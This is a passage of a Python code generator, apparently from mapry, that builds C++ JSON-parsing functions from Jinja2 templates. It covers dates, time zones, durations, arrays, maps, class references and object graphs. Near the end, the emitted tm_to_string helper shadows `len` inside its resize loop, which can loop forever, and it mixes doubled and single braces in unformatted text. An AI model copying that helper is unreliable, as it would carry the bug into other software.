:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
uid = auto_id.next_identifier()
if cpp.datetime_library == 'ctime':
return _PARSE_CTIME_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
if cpp.datetime_library == 'date.h':
return _PARSE_DATE_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
raise NotImplementedError(
"Unhnadled datetime library: {}".format(cpp.datetime_library))
@ensure(lambda result: not result.endswith('\n'))
def _parse_date_time(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Datetime, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse a date-time.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
uid = auto_id.next_identifier()
if cpp.datetime_library == 'ctime':
return _PARSE_CTIME_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
if cpp.datetime_library == 'date.h':
return _PARSE_DATE_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
raise NotImplementedError(
"Unhnadled datetime library: {}".format(cpp.datetime_library))
_PARSE_TIME_OF_DAY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
std::chrono::seconds seconds_of_day_{{ uid }};
std::istringstream iss_{{ uid }}(
{{ value }}.asString());
iss_{{ uid }} >>
date::parse(
{{ a_type.format|escaped_str }},
seconds_of_day_{{ uid }} );
if (iss_{{ uid }}.fail()) {
constexpr auto expected_but_got(
"Expected to date::parse "
{{ a_type.format|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
{{ value }}.asString()));
} else {
{{ target_expr }} = date::make_time(
seconds_of_day_{{ uid }});
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_time(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Time, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse a time.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
uid = auto_id.next_identifier()
if cpp.datetime_library == 'ctime':
return _PARSE_CTIME_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
elif cpp.datetime_library == 'date.h':
return _PARSE_TIME_OF_DAY_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
else:
raise NotImplementedError(
"Unhnadled datetime library: {}".format(cpp.datetime_library))
_PARSE_TIME_ZONE_AS_STR_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{{ target_expr }} = {{ value }}.asString();
}''')
_PARSE_TIME_ZONE_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
const std::string cast_{{ uid }} = {{ value }}.asString();
try {
{{ target_expr }} = date::locate_zone(
cast_{{ uid }});
} catch(const std::runtime_error& e) {
constexpr auto expected_but_got(
"Expected a valid IANA time zone, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
cast_{{ uid }}));
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_time_zone(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.TimeZone, auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse a time zone.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
uid = auto_id.next_identifier()
if cpp.datetime_library == 'ctime':
return _PARSE_TIME_ZONE_AS_STR_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
if cpp.datetime_library == 'date.h':
return _PARSE_TIME_ZONE_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
raise NotImplementedError(
"Unhandled datetime library: {}".format(cpp.datetime_library))
_PARSE_DURATION_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
const std::string cast_{{ uid }}_str = {{ value }}.asString();
std::string error_{{ uid }};
std::chrono::nanoseconds cast_{{ uid }} = duration_from_string(
cast_{{ uid }}_str, &error_{{ uid }});
if (!error_{{ uid }}.empty()) {
constexpr auto invalid_duration(
"Invalid duration: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
invalid_duration,
strlen(invalid_duration),
error_{{ uid }}));
} else {
{{ target_expr }} = cast_{{ uid }};
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_duration(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Duration, auto_id: _AutoID) -> str:
"""
Generate the code to parse a duration.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param auto_id: generator of unique identifiers
:return: generated code
"""
uid = auto_id.next_identifier()
return _PARSE_DURATION_TPL.render(
uid=uid,
value_expr=value_expr,
ref_parts=ref_parts,
target_expr=target_expr,
a_type=a_type).rstrip("\n")
_PARSE_ARRAY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}{## set value expression ##}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
{% set set_target %}{## set target block ##}
{{ target_cpp_type }}& target_{{ uid }} = {{ target_expr }};
target_{{ uid }}.resize({{ value }}.size());
size_t i_{{ uid }} = 0;
for (const Json::Value& item_{{ uid }} : {{ value }}) {
{{ item_parsing|indent }}
++i_{{ uid }};
if (errors->full()) {
break;
}
}
{% endset %}
if (!{{ value }}.isArray()) {
constexpr auto expected_but_got(
"Expected an array, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
{% if minimum_size is not none %}
} else if ({{ value }}.size() < {{ minimum_size }}) {
constexpr auto expected_but_got(
"Expected an array of minimum size "
{{ "%d"|format(minimum_size)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string({{ value }}.size())));
{% endif %}{# /if minimum_size is not none #}
{% if maximum_size is not none %}
} else if ({{ value }}.size() > {{ maximum_size }}) {
constexpr auto expected_but_got(
"Expected an array of maximum size "
{{ "%d"|format(maximum_size)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string({{ value }}.size())));
{% endif %}{# /if maximum_size is not none #}
} else {
{{ set_target|indent }}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_array(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Array, registry_exprs: Mapping[mapry.Class, str],
auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse an array.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param registry_exprs:
map class to C++ expression of the registry of the class instances
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
uid = auto_id.next_identifier()
item_parsing = _parse_value(
value_expr="item_{uid}".format(uid=uid),
target_expr="target_{uid}.at(i_{uid})".format(uid=uid),
ref_parts=ref_parts +
['"/"', 'std::to_string(i_{uid})'.format(uid=uid)],
a_type=a_type.values,
registry_exprs=registry_exprs,
auto_id=auto_id,
cpp=cpp)
return _PARSE_ARRAY_TPL.render(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
uid=uid,
minimum_size=a_type.minimum_size,
maximum_size=a_type.maximum_size,
target_cpp_type=mapry.cpp.generate.type_repr(a_type=a_type, cpp=cpp),
item_parsing=item_parsing)
_PARSE_MAP_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isObject()) {
constexpr auto expected_but_got(
"Expected an object, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{{ target_cpp_type }}& target_{{ uid }} = {{ target_expr }};
for (Json::ValueConstIterator it_{{ uid }} = {{ value }}.begin(); {#
#}it_{{ uid }} != {{ value }}.end(); {#
#}++it_{{ uid }}) {
{{ item_parsing|indent|indent }}
if (errors->full()) {
break;
}
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_map(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Map, registry_exprs: Mapping[mapry.Class, str],
auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse a map.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param registry_exprs:
map class to C++ expression of the registry of the class instances
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
uid = auto_id.next_identifier()
item_parsing = _parse_value(
value_expr="*it_{uid}".format(uid=uid),
target_expr="target_{uid}[it_{uid}.name()]".format(uid=uid),
ref_parts=ref_parts + ['"/"', 'it_{uid}.name()'.format(uid=uid)],
a_type=a_type.values,
registry_exprs=registry_exprs,
auto_id=auto_id,
cpp=cpp)
return _PARSE_MAP_TPL.render(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
uid=uid,
target_cpp_type=mapry.cpp.generate.type_repr(a_type=a_type, cpp=cpp),
item_parsing=item_parsing)
_PARSE_CLASS_REF_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
const std::string& cast_{{ uid }} = {{ value }}.asString();
if ({{ registry_expr }}.count(cast_{{ uid }}) == 0) {
constexpr auto reference_not_found(
"Reference to an instance of class "
{{ class_name|escaped_str }}
" not found: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
reference_not_found,
strlen(reference_not_found),
cast_{{ uid }}));
} else {
{{ target_expr }} = {{ registry_expr }}.at(cast_{{ uid }}).get();
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_instance_reference(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Class, registry_expr: str, auto_id: _AutoID) -> str:
"""
Generate the code to parse a reference to an instance of a class.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param registry_expr:
C++ expression of the registry of the class instances
:param auto_id: generator of unique identifiers
:return: generated code
"""
uid = auto_id.next_identifier()
return _PARSE_CLASS_REF_TPL.render(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
uid=uid,
class_name=a_type.name,
registry_expr=registry_expr)
_PARSE_EMBED_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
{{ embed_name|as_variable }}_from(
{{ value }},
{% for registry_expr in selected_registry_exprs %}
{{ registry_expr }},
{% endfor %}
{{ ref_parts|join_strings|indent }},
&{{ target_expr }},
errors);''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_embed(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Embed, registry_exprs: Mapping[mapry.Class, str],
auto_id: _AutoID) -> str:
"""
Generate the code to parse an embeddable structure.
The code parses the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry definition of the value type
:param registry_exprs:
map class to C++ expression of the registry of the class instances
:param auto_id: generator of unique identifiers
:return: generated code
"""
uid = auto_id.next_identifier()
references = mapry.references(a_type=a_type)
# yapf: disable
return _PARSE_EMBED_TPL.render(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
uid=uid,
embed_name=a_type.name,
selected_registry_exprs=[
registry_exprs[reference]
for reference in references])
# yapf: enable
@ensure(lambda result: not result.endswith('\n'))
def _parse_value(
value_expr: str, target_expr: str, ref_parts: List[str],
a_type: mapry.Type, registry_exprs: Mapping[mapry.Class, str],
auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse the the ``value_expr`` into the ``target_expr``.
:param value_expr: C++ expression of the JSON value
:param target_expr: C++ expression of where to store the parsed value
:param ref_parts: C++ expression of reference path segments to the value
:param a_type: mapry type of the value
:param registry_exprs:
map class to C++ expression of the registry of the class instances
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
# pylint: disable=too-many-branches
if isinstance(a_type, mapry.Boolean):
body = _parse_boolean(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
auto_id=auto_id)
elif isinstance(a_type, mapry.Integer):
body = _parse_integer(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id)
elif isinstance(a_type, mapry.Float):
body = _parse_float(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id)
elif isinstance(a_type, mapry.String):
body = _parse_string(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id)
elif isinstance(a_type, mapry.Path):
body = _parse_path(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.Date):
body = _parse_date(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.Datetime):
body = _parse_date_time(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.Time):
body = _parse_time(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.TimeZone):
body = _parse_time_zone(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.Duration):
body = _parse_duration(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
auto_id=auto_id)
elif isinstance(a_type, mapry.Array):
body = _parse_array(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
registry_exprs=registry_exprs,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.Map):
body = _parse_map(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
registry_exprs=registry_exprs,
auto_id=auto_id,
cpp=cpp)
elif isinstance(a_type, mapry.Class):
assert a_type in registry_exprs, \
('Missing registry expression for class {} (ref: {}); '
'available registry expressions: {}').format(
a_type.name, a_type.ref,
[cls.name for cls in registry_exprs.keys()])
body = _parse_instance_reference(
value_expr=value_expr,
target_expr=target_expr,
ref_parts=ref_parts,
a_type=a_type,
registry_expr=registry_exprs[a_type],
auto_id=auto_id)
elif isinstance(a_type, mapry.Embed):
body = _parse_embed(
target_expr=target_expr,
value_expr=value_expr,
ref_parts=ref_parts,
a_type=a_type,
registry_exprs=registry_exprs,
auto_id=auto_id)
else:
raise NotImplementedError(
"Unhandled parsing of type: {}".format(a_type))
return body
_PARSE_PROPERTY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
////
// Parse {{ a_property.name|as_field }}
////
{% if not a_property.optional %}
if (!{{value_obj_expr}}.isMember({{a_property.json|escaped_str}})) {
errors->add(
{{ ref_obj_parts|join_strings|indent|indent }},
{{ "Property is missing: %s"|format(a_property.json)|escaped_str }});
} else {
{{ parsing|indent }}
}
{% else %}
if ({{value_obj_expr}}.isMember({{a_property.json|escaped_str}})) {
{% if needs_emplace %}
{{ property_target_expr }}.emplace();
{% endif %}{# /if needs_emplace #}
{{ parsing|indent }}
}
{% endif %}{# /if not a_property.optional #}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_property(
target_obj_expr: str, value_obj_expr: str, ref_obj_parts: List[str],
a_property: mapry.Property, registry_exprs: Mapping[mapry.Class, str],
auto_id: _AutoID, cpp: mapry.Cpp) -> str:
"""
Generate the code to parse a property of a composite from a JSON object.
:param target_obj_expr:
C++ expression of the object to store the properties
:param value_obj_expr: C++ expression of the JSON object
:param ref_obj_parts:
C++ expression of the reference path segments to the object
:param a_property: mapry definition of the property
:param registry_exprs:
map class to C++ expression of the registry of the class instances
:param auto_id: generator of unique identifiers
:param cpp: C++ settings
:return: generated code
"""
field = mapry.cpp.naming.as_field(identifier=a_property.name)
property_target_expr = "{}->{}".format(target_obj_expr, field)
property_value_expr = "{}[{}]".format(
value_obj_expr, mapry.cpp.generate.escaped_str(a_property.json))
property_ref_parts = ref_obj_parts + [
mapry.cpp.generate.escaped_str("/" + a_property.json)
]
# Special handling of the optional property
needs_emplace = isinstance(
a_property.type, (mapry.Array, mapry.Map, mapry.Embed))
parsing_target_expr = property_target_expr
if a_property.optional:
if isinstance(a_property.type, (mapry.Array, mapry.Map)):
parsing_target_expr = "*{}".format(property_target_expr)
elif isinstance(a_property.type, mapry.Embed):
parsing_target_expr = "(*{})".format(property_target_expr)
# yapf: disable
parsing = _parse_value(
value_expr=property_value_expr,
target_expr=parsing_target_expr,
ref_parts=property_ref_parts,
a_type=a_property.type,
registry_exprs=registry_exprs,
auto_id=auto_id,
cpp=cpp)
# yapf: enable
text = _PARSE_PROPERTY_TPL.render(
a_property=a_property,
value_obj_expr=value_obj_expr,
ref_obj_parts=ref_obj_parts,
parsing=parsing,
property_target_expr=property_target_expr,
needs_emplace=needs_emplace)
return text.rstrip("\n")
_PARSE_COMPOSITE_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
void {{ composite.name|as_variable }}_from(
const Json::Value& value,
{% for ref_cls in references %}
const std::map<std::string, std::unique_ptr<{{
ref_cls.name|as_composite }}>>& {{
ref_cls.plural|as_variable }}_registry,
{% endfor %}
std::string ref,
{{ composite.name|as_composite }}* target,
parse::Errors* errors) {
if (!value.isObject()) {
constexpr auto expected_but_got(
"Expected an object, but got: ");
errors->add(
ref,
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
value.type())));
return;
}
{% for prop in composite.properties.values() %}
{{ property_parsing[prop]|indent }}
if (errors->full()) {
return;
}
{% endfor %}{# /for prop in composite.properties.values() #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_composite(
composite: Union[mapry.Class, mapry.Embed], cpp: mapry.Cpp) -> str:
"""
Generate the code of the function that parses a composite.
:param composite: mapry definition of the composite
:param cpp: C++ settings
:return: generated code
"""
references = mapry.references(a_type=composite)
# yapf: disable
registry_exprs = {
ref_cls: '{}_registry'.format(
mapry.cpp.naming.as_variable(ref_cls.plural))
for ref_cls in references
}
# yapf: enable
auto_id = _AutoID()
# yapf: disable
property_parsing = {
prop: _parse_property(
target_obj_expr="target",
value_obj_expr="value",
ref_obj_parts=["ref"],
a_property=prop,
registry_exprs=registry_exprs,
auto_id=auto_id,
cpp=cpp)
for prop in composite.properties.values()
}
# yapf: enable
return _PARSE_COMPOSITE_TPL.render(
composite=composite,
references=references,
property_parsing=property_parsing)
_PARSE_GRAPH_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
void {{ graph.name|as_variable }}_from(
const Json::Value& value,
std::string ref,
{{ graph.name|as_composite }}* target,
parse::Errors* errors) {
if (errors == nullptr) {
throw std::invalid_argument("Unexpected null errors");
}
if (!errors->empty()) {
throw std::invalid_argument("Unexpected non-empty errors");
}
if (!value.isObject()) {
constexpr auto expected_but_got(
"Expected an object, but got: ");
errors->add(
ref,
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
value.type())));
return;
}
{% for cls in graph.classes.values() %}
////
// Pre-allocate {{ cls.plural|as_field }}
////
std::string {{ cls.plural|as_variable }}_ref;
{{ cls.plural|as_variable }}_ref.reserve(ref.size() + {{
"/%s"|format(cls.plural|json_plural)|length }});
{{ cls.plural|as_variable }}_ref += ref;
{{ cls.plural|as_variable }}_ref += {{
"/%s"|format(cls.plural|json_plural)|escaped_str }};
if (value.isMember({{ cls.plural|json_plural|escaped_str }})) {
const Json::Value& obj = value[{{
cls.plural|json_plural|escaped_str }}];
if (!obj.isObject()) {
constexpr auto expected_but_got(
"Expected an object, but got: ");
errors->add(
{{ cls.plural|as_variable }}_ref,
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
obj.type())));
} else {
for (Json::ValueConstIterator it = obj.begin();
it != obj.end(); ++it) {
{% set set_instance %}
auto instance = std::make_unique<{{ cls.name|as_composite }}>();
instance->id = it.name();
target->{{
cls.plural|as_field }}[it.name()] = std::move(instance);
{% endset %}
{% if cls.id_pattern is not none %}
if (!std::regex_match(
it.name(),
{{ cls.name|as_variable }}_re::kID)) {
constexpr auto expected_but_got(
"Expected ID to match "
{{ cls.id_pattern.pattern|escaped_str }}
", but got: ");
errors->add(
{{ cls.plural|as_variable }}_ref,
message(
expected_but_got,
strlen(expected_but_got),
it.name()));
if (errors->full()) {
break;
}
} else {
{{ set_instance|indent }}
}
{% else %}
{{ set_instance }}
{% endif %}{# /if cls.id_pattern is not none #}
}
}
}
{% endfor %}
{% if graph.classes %}
// Pre-allocating class instances is critical.
// If the pre-allocation failed, we can not continue to parse the instances.
if (!errors->empty()) {
return;
}
// Keep the prefix fixed in this buffer so that
// it is copied as little as possible
std::string instance_ref;
{% endif %}
{% for cls in graph.classes.values() %}
////
// Parse {{ cls.plural|as_field }}
////
// clear() does not shrink the reserved memory,
// see https://en.cppreference.com/w/cpp/string/basic_string/clear
instance_ref.clear();
instance_ref += {{ cls.plural|as_variable }}_ref;
instance_ref += '/';
if (value.isMember({{ cls.plural|json_plural|escaped_str }})) {
const Json::Value& obj = value[{{
cls.plural|json_plural|escaped_str }}];
for (Json::ValueConstIterator it = obj.begin(); it != obj.end(); ++it) {
instance_ref.reserve(
{{ cls.plural|as_variable }}_ref.size() + 1 + it.name().size());
instance_ref.resize(
{{ cls.plural|as_variable }}_ref.size() + 1);
instance_ref.append(
it.name());
{{ cls.name|as_composite }}* instance(
target->{{ cls.plural|as_field }}.at(it.name()).get());
{{ cls.name|as_variable }}_from(
*it,
{% for ref_cls in references[cls] %}
target->{{ ref_cls.plural|as_field }},
{% endfor %}
instance_ref,
instance,
errors);
if (errors->full()) {
break;
}
}
}
if (errors->full()) {
return;
}
{% endfor %}
{% for property_parsing in property_parsings %}
{{ property_parsing|indent }}
if (errors->full()) {
return;
}
{% endfor %}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_graph(graph: mapry.Graph, cpp: mapry.Cpp) -> str:
"""
Generate the code that parses an object graph.
:param graph: definition of the object graph
:param cpp: C++ settings
:return: generated code
"""
# Map mapry class -> referenced mapry classes
references = dict() # type: MutableMapping[mapry.Class, List[mapry.Class]]
for cls in graph.classes.values():
references[cls] = mapry.references(a_type=cls)
# Map mapry class -> C++ expression of the instance registry
registry_exprs = dict() # type: Dict[mapry.Class, str]
for cls in graph.classes.values():
plural_field = mapry.cpp.naming.as_field(identifier=cls.plural)
registry_exprs[cls] = 'target->{}'.format(plural_field)
# Gather property parsings in a list so that they can be readily inserted
# in the template
property_parsings = [] # type: List[str]
auto_id = _AutoID()
for prop in graph.properties.values():
property_parsings.append(
_parse_property(
target_obj_expr="target",
value_obj_expr="value",
ref_obj_parts=['ref'],
a_property=prop,
registry_exprs=registry_exprs,
auto_id=auto_id,
cpp=cpp))
text = _PARSE_GRAPH_TPL.render(
graph=graph, references=references, property_parsings=property_parsings)
assert isinstance(text, str)
return text.rstrip("\n")
@ensure(lambda result: not result.endswith('\n'))
def _datetime_to_string() -> str:
"""
Generate the code of a function that translates the date/time to a string.
:return: generated code
"""
return textwrap.dedent(
'''\
/**
* serializes the date/time/datetime to a string.
*
* @param[in] t time structure
* @param[in] fmt format
* @return time structure serialized to a string according to the format
*/
std::string tm_to_string(const struct tm& t, const char* fmt) {{
if(fmt == nullptr or fmt[0] == '\\0') {
return "";
}
const size_t fmt_size = strlen(fmt);
std::string buf;
buf.resize(fmt_size * 4);
int len = strftime(&buf[0], buf.size(), fmt, &t);
while(len == 0) {{
buf.resize(buf.size() * 2);
int len = strftime(&buf[0], buf.size(), fmt, &t);
}}
buf.resize(len);
return buf;
}}''')
@ensure(lambda result: not result.endswith('\n'))
def _duration_to_string() -> str:
"""
Generate the code for serializing durations to strings.
:return: generated code
"""
return textwrap.dedent(
'''\
/**
* serializes the duration to a string.
*
* @param[in] d duration to be serialized
* @return duration as string
*/
std::string duration_to_string(const std::chrono::nanoseconds& d) {
typedef std::chrono::nanoseconds::rep rep_t;
const rep_t abscount = (d.count() < 0) ? -d.count() : d.count();
if (abscount < 0) {
std::stringstream sserr;
sserr
<< "Computing the absolute number of nanoseconds "
"in the duration underflowed: "
<< d.count();
throw std::overflow_error(sserr.str());
}
